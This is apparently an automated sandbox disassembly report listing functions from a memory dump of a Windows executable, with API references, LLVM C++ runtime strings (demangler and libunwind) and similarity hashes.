Function 00007FF77970B468 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF77970B4FB

Strings

starts_with(SV, "basic_"), xrefs: 00007FF77970B4E7
basic_string, xrefs: 00007FF77970B46D
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF77970B4EE
basi, xrefs: 00007FF77970B4B2

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
API String ID: 1222420520-1046023109
Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction ID: 5a5e28259fe57fca0d30ff1aec25bc73a27630df037304005984939a43f043f1
Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction Fuzzy Hash: 00F096B3637A13C2E6609F08E440728A371EB48BA4F908230C52C02AD0DE2D9616C760

Function 00007FF77970FBC0 Relevance: 7.7, APIs: 5, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF77970FED0: realloc.MSVCRT ref: 00007FF77970FF80
Part of subcall function 00007FF77970FED0: free.MSVCRT ref: 00007FF779710085

realloc.MSVCRT ref: 00007FF77970FC66
realloc.MSVCRT ref: 00007FF77970FD02
realloc.MSVCRT ref: 00007FF77970FD6A
memcpy.MSVCRT ref: 00007FF77970FD87
realloc.MSVCRT ref: 00007FF77970FE6D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$freememcpy
String ID:
API String ID: 2038854750-0
Opcode ID: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction ID: f232c3ad53d3c86a78b2ea4566a0efbdd5c44242678345d9e3e980110769fbfc
Opcode Fuzzy Hash: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction Fuzzy Hash: A691D1A3A2AA4682EF54AF1AD991379A7B1FB58FC4F848431CF4D47391DF2CD4628350

Function 00007FF779704F60 Relevance: 7.7, APIs: 5, Instructions: 227COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779704FED
realloc.MSVCRT ref: 00007FF77970506D
malloc.MSVCRT ref: 00007FF7797050D6

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$malloc
String ID:
API String ID: 454241450-0
Opcode ID: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction ID: a32115f478c4b2908922a6d2515dc6e9bb0827ff784e62a844708a3069c67101
Opcode Fuzzy Hash: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction Fuzzy Hash: EF71D773A26B8682DA259F1AE8446ADB371FB58BC0F848531CF9D077A1DF3CD5528350

Function 00007FF7797057A0 Relevance: 7.7, APIs: 5, Instructions: 217COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779705814
realloc.MSVCRT ref: 00007FF7797058DE
realloc.MSVCRT ref: 00007FF77970592D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction ID: d4124bc0280c37567f57179c886ecd8df99fceb573e15e3061d5fcfd6c26023b
Opcode Fuzzy Hash: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction Fuzzy Hash: 807171B3A26B4682EA65DF46E941269A771FB58BC0F848431DF9E07790EF3CE491C350

Function 00007FF7796FF040 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7796FF0EA

Strings

std, xrefs: 00007FF7796FF146
Last != First && "Calling back() on empty vector!", xrefs: 00007FF7796FF8C7
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF7796FF8CE
struct, xrefs: 00007FF7796FF042

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$std$struct
API String ID: 2803490479-3902771045
Opcode ID: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction ID: 03890fa4e442d67ff6a5119025b8b76ada89c835e6b041d0ecbb547e1bfd1d12
Opcode Fuzzy Hash: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction Fuzzy Hash: DC311233B3B68380EB159F15D50577AA6A6AB08BD0F854231CE5C4B390EF3CE492C320

Function 00007FF7796F4D90 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

cannot create thread specific key for __cxa_get_globals(), xrefs: 00007FF7796F4DF0
execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF7796F4DBA
cannot zero out thread value for __cxa_get_globals(), xrefs: 00007FF7796F4E1F

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: Once$ExecuteInit
String ID: cannot create thread specific key for __cxa_get_globals()$cannot zero out thread value for __cxa_get_globals()$execute once failure in __cxa_get_globals_fast()
API String ID: 689400697-2130391284
Opcode ID: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction ID: 3b9dedcf996769092eafc355570d8ab0bdfa4baac9ea2dc5a2b69920d439a7f2
Opcode Fuzzy Hash: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction Fuzzy Hash: EF215523F3B50392FA54BF15AC456B5E273AF98780FD04934D90D86AA1FE3CA5558360

Function 00007FF7796F6DB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7796F6E40

Strings

+, xrefs: 00007FF7796F6EA5

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction ID: f31a6a794eb52299dd81ff0bcc22d387124103602d50ba1eb2eba7d2022d4753
Opcode Fuzzy Hash: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction Fuzzy Hash: E951D66363D6878BE734AE15E05067FF7B3E741754F844239DB9A87A81EB2CE5018B10

Function 00007FF7797117D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF779711860

Strings

+, xrefs: 00007FF7797118C5

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction ID: 9f65447fcda4ba756ff14916e6116329312d8c09f14532bf068d7a1e30f25f42
Opcode Fuzzy Hash: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction Fuzzy Hash: 4151A52367D2838BE724EE25D05067EF7B1E7897D0F848535DBAA4BA81DB2CE501CB50

Function 00007FF7796F8350 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF7796F83AA
RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7796F84FA

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF7796F83A3
libunwind: __unw_init_local(cursor=%p, context=%p), xrefs: 00007FF7796F83D0

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: CaptureContextgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_init_local(cursor=%p, context=%p)
API String ID: 2386080382-2955335536
Opcode ID: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction ID: 4b38ff7d0eccbf0222e0254104ed1959bfa3538e3fd461bb32473d508854ade5
Opcode Fuzzy Hash: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction Fuzzy Hash: 3B614022959AC192F32A4B2CE4057F5B3B4FF94355F446211EFD912261FF3AA6E6C340

Function 00007FF779711336 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7797113A0
memset.MSVCRT ref: 00007FF779711431
fputc.MSVCRT ref: 00007FF7797114A9

Strings

0, xrefs: 00007FF779711451

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset$fputc
String ID: 0
API String ID: 2903701566-4108050209
Opcode ID: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction ID: d056e5568aab7f9dcd47d738724253de48339974428dc060033318adb474caf8
Opcode Fuzzy Hash: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction Fuzzy Hash: EC412A53E7A283C3F775EE259040379A6E1AB59BC0F845530CE6A5A6C1EA3CF840C3A4

Function 00007FF7796F86C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF7796F86ED
fflush.MSVCRT ref: 00007FF7796F8739

Strings

libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx), xrefs: 00007FF7796F8719
LIBUNWIND_PRINT_APIS, xrefs: 00007FF7796F86E6

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx)
API String ID: 1137233558-2498214732
Opcode ID: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction ID: 0b4d3ca60785e8bf6772990839f2afe320a4fca5e0eb6087f81b34da6fa0caaf
Opcode Fuzzy Hash: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction Fuzzy Hash: 39318127A3AA4781EB10AF1AE840379E772AB99FD4F940136CE4E537A0DE3CD8458350

Function 00007FF7796F29A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF7796F29B7

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction ID: 200c29fe83fe9518e12fc2f8cda816cbce9e90154427ce65a0977144ab9d0d76
Opcode Fuzzy Hash: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction Fuzzy Hash: C521B123E7F50382FA747E1895903BB9163DF84760F948732CD0E872C5ED6CA8C18A61

Function 00007FF77970149D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF7797016CB

Part of subcall function 00007FF779700A70: strlen.MSVCRT ref: 00007FF779700B79

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF779701E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779701E5C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 770973918-3503049562
Opcode ID: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction ID: fd458458358c6078ef38aed51ecfdef3befa2930df11970b3a8cf88309c9beba
Opcode Fuzzy Hash: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction Fuzzy Hash: 2831F33363A78286EA55DF28D8043A8B7B4EB49B81F854235DE5C47391EE38E586C360

Function 00007FF779701215 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF779700B79
malloc.MSVCRT ref: 00007FF779701251
_assert.MSVCRT ref: 00007FF779701E69
malloc.MSVCRT ref: 00007FF779701EB6

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF779701E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779701E5C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction ID: 431d40e2d8e8adb2530b8cba703ced52c27b9fe8c9121033a8c03361c4e5a4ef
Opcode Fuzzy Hash: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction Fuzzy Hash: 7021E43322674289EB55DB18A4097A977B8EB08BC1F840636EE5C077A1EE38E546C360

Function 00007FF77970C460 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970C498
realloc.MSVCRT ref: 00007FF77970C4FF

Strings

_if:, xrefs: 00007FF77970C4B7
[enable, xrefs: 00007FF77970C4A9

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: [enable$_if:
API String ID: 471065373-3342140569
Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction ID: ab20317ac290e72f4de4d44d308474ec3ddeeb0ba2c766117cd6045a9d4efdc8
Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction Fuzzy Hash: A81150F3A26B4782DA18AF06F95426DA362EB98BC0F94C531CB4E477A1EE3CD4418350

Function 00007FF7796F8600 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF7796F862C
fflush.MSVCRT ref: 00007FF7796F8678

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF7796F8625
libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p), xrefs: 00007FF7796F8658

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
